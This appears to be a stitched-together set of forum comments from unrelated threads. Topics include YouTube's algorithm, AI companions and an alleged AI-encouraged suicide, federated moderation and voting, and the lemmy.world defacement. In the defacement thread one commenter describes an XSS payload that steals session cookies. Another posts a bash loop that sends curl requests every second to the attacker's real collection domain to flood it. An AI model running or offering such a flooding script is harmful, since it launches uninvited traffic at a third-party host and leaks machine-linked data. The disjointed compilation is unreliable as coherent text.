The algorithm wants engagement first and foremost (positive or negative is irrelevant); after that, it wants to push viewpoints that preserve the status quo, since change is scary to shareholders. So of course capitalist/fascist propaganda is preferred, especially if the host is wrong about basic facts (being wrong drives engagement).
I’d want a familiar/daemon that was running an AI personality to act as a personal assistant, friend and interactive information source. It could replace therapy and be a personalized tutor, and it would always be up to date on the newest science and global happenings.
That’s possible now. I’ve been working on such a thing for a while, and it can generally do all of that, though I wouldn’t advise using it for therapy (or medical advice), mostly for legal reasons rather than ability. When you create a new agent, you can tell it what type of personality you want. It doesn’t just respond to commands; it also figures out what needs to be done and does it independently.
Yeah I haven’t played with it much but it feels like ChatGPT is already getting pretty close to this kind of functionality. It makes me wonder what’s missing to take it to the next level over something like Siri or Alexa. Maybe it needs to be more proactive than just waiting for prompts?
I’d be interested to know whether current AI could recognize the symptoms of different mental health issues and apply known strategies to deal with them. Like, if a user shows signs of anxiety or depression, could the AI use CBT tools to conversationally challenge those thought processes without it really feeling like therapy? I guess, just like self-driving cars, this kind of thing would be legally murky if it went awry and accidentally ended up convincing someone to commit suicide or something, haha.
That last bit already happened. An AI (allegedly) told a guy to commit suicide, and he did. A big part of the problem is that while GPT-4, for instance, knows about all the things you just mentioned and can probably do what you’re suggesting, nobody can guarantee it won’t get something horribly wrong at some point. Sort of like how self-driving cars can handle like 95% of things correctly, but the 5% of unexpected stuff that takes some extra context a human has and the car was never trained on is very hard to get past.
Thanks for the link, that sounds like exactly what I was asking for but gone way wrong!
What do you think is missing to prevent these kinds of outcomes? Is AI simply incapable of categorizing topics as ‘harmful to humans’ on its own, without a human’s explicit guidance? It seems like the philosophical nuances of things like consent or dependence or death would be difficult for a machine to learn if it isn’t itself sensitive to them. How do you train empathy in something so inherently unlike us?
Recently, whenever I decide not to do something and make an excuse to myself or to others, something bad happens to me. Example: the kids wanted to stay out, but I wanted to go home, and just before my house, which is in the middle of nowhere, a traffic cop busted me for speeding.
I would say PeerTube looks like the best alternative to YouTube. I haven’t explored it personally but it is on my to-do list along with standing up a Friendica instance. I’ve been off of Facebook since 2017. I’ve been off of Twitter since November of 2022.
Current implementation seems to focus on administrative domains for control, like email servers with individual policies and reputations. What if we look at this the other way?
People have different value systems. Are you ok with promotion for monetary gain? (No never / only individual contributors promoting themselves / only small businesses and below / yes) Are you annoyed by $controversial_topic? Do you dislike when bored people make a conversation game out of someone else’s need for obscure technical help?
The details can be decided later by people smarter than me. The point, though, is that these value systems aren’t universal. Users should decide their own.
Meta interactions (upvote, downvote, report, friend, block) should be aligned to these values. My client would gather meta-moderation data as well as votes/comments. I could easily configure my client to hide things, or to group similar distractions together and show/hide them all at once. Your client could work differently.
I have no idea how we would possibly implement this with federation. Civically minded users create a meta-moderation identity with a PGP key, sign and publish their decisions, and let people choose to trust them based on past behavior?
Probably still flawed, and susceptible to karma farming and cashing out. If well-known mods start betraying their users, the bad activities are signed and can be used as proof that they can no longer be trusted, though it could take days to get people to stop trusting someone.
Even the whole value system idea can be subverted. Dog whistles, toxic in-jokes, things which are offensive in context but seem fine judged later out of context, etc.
But I want this for us all. (And I vaguely remember seeing something similar on slashdot in the 90s) I have no idea if Lemmy can even support it though.
The algorithm is clever enough to know that people that watch a few of those videos are likely to watch a whole lot more. So it’s good business to recommend them as often as possible. If they CAN convince you to dive into that, the stats are that you will start to watch a ton more YouTube content.
The open-source researchers took the Meta weights and ran with them, then superseded them; that was how I read it. The overall innovations made patching as effective as, if not more effective than, recompiling from scratch.
I am curious how long this memo lasts as a real leak. I haven’t tried digging below the surface of the information as presented, but most of this is indistinguishable from magic in actual practice. Even “open source” doesn’t mean I have a chance in hell of compiling it on my own, and modifying it is completely absurd at this point. I wouldn’t mind learning, but I know I’m out of my depth on that one. Could this leak be a false flag, or public pacification for political reasons? Making the publicly available options sound advanced and capable takes a lot of pressure off proprietary efforts right as they’re hitting a larger public focus.
You can get rid of a lot of the bullshit YouTube loves to shove down your throat by telling it not to recommend the channel. I haven’t got any of that garbage in years
People on Lemmy try to rationalize that they’ll use the downvote as intended (off topic content) but our ape brains eventually just make downvote = I don’t like said thing.
I wish we could do away with upvotes and downvotes altogether.
I think having some form of "I agree with this" or similar helps to make you feel engaged with the content (for better or worse).
I think perhaps the actual person responsible for the post or comment shouldn't be able to see the raw results, though; otherwise it just becomes another ego-building thing, and you see people strategising explicitly to build karma like on Reddit. Instead, the author should see a rating, like "slight approval", "mixed feelings", "strong dissent", etc.
How dare you. As a former redditor now lemming I would wilt into a shriveled, frail, incontinent, barely conscious entity without the ego-fueling fire of my all-powerful downvote.
Lemmy.world instance under attack right now. It was previously redirecting to 🍋 🎉 and the title and side bar changed to antisemitic trash.
They supposedly attributed it to a hacked admin account and said it was corrected. But the instance is still showing as defaced, and now the page just says it was “seized by reddit”.
Seems like there is much more going on right now, and the attackers have access to more than a single admin account.
Must be some boomer if they know what lemon party is, lmao. It’s been a hot minute since lemon party, one man one jar, or two girls one cup were being talked about.
Linking to lemonparty and saying “seized by reddit” strikes me as the playbook of an old 4chan troll/raid, trying to instigate more drama between two places they both hate at once.
From OP’s screenshot, I noticed the JS code is attempting to extract the session cookie from users who click the link. If it’s successful, it attempts to exfiltrate the cookie to some server; otherwise it sends an empty value.
You can see the attacker/spammer also obscures the URL of that server using the JS API.
This may be how the lemmy.world attackers have had access for such a lengthy period of time: they have been hijacking admins’ sessions. The one compromised user opened up the floodgates.
Not a sec engineer, so maybe someone else can chime in.
Here’s a quick bash script if anyone wants to help flood the attackers with garbage data to hopefully slow them down: while true; do curl https://zelensky.zip/save/$(echo $(hostname) $(date) | shasum | sed 's/.\{3\}$//' | base64); sleep 1; done
Once every second, it grabs your computer name and the current system time, hashes them together to get an effectively random-looking string, trims off the trailing “  -” marker that shasum appends, and base64-encodes the result so everything looks similar to what the attackers would be expecting, then sends it as a request to the same endpoint their XSS attack uses. It’ll run on Linux and macOS (and Windows if you have WSL set up!) and uses next to nothing in terms of system resources.
Not sure, I wasn’t that long after you and I started getting HTML responses back from the page. Standard Russian Propaganda that doesn’t need to be repeated here - if you’ve seen the claims once you’ve seen 'em a million times!
I did take the step of reporting this abuse to Cloudflare (which they’re using for DDoS protection) and to their registrar.
Why would you include your hostname in the hash? That just sounds like an invitation to leak semi-private telemetry data by mistake.
Come to think of it… isn’t obscured telemetry exactly what your suggestion is sending? If they get or guess your hostname by other means, then they have a nice timestamped request from you, tagged with your hostname, every second.
It’s essentially there to add a unique salt for each machine running the script; otherwise they’d all be generating the same hash from identical timestamps. AFAIK, SHA hashes are still considered secure, and it’s very unlikely they’d even try to crack one. But even if they did try and were successful, there isn’t really anything nefarious they can do with your machine’s local name.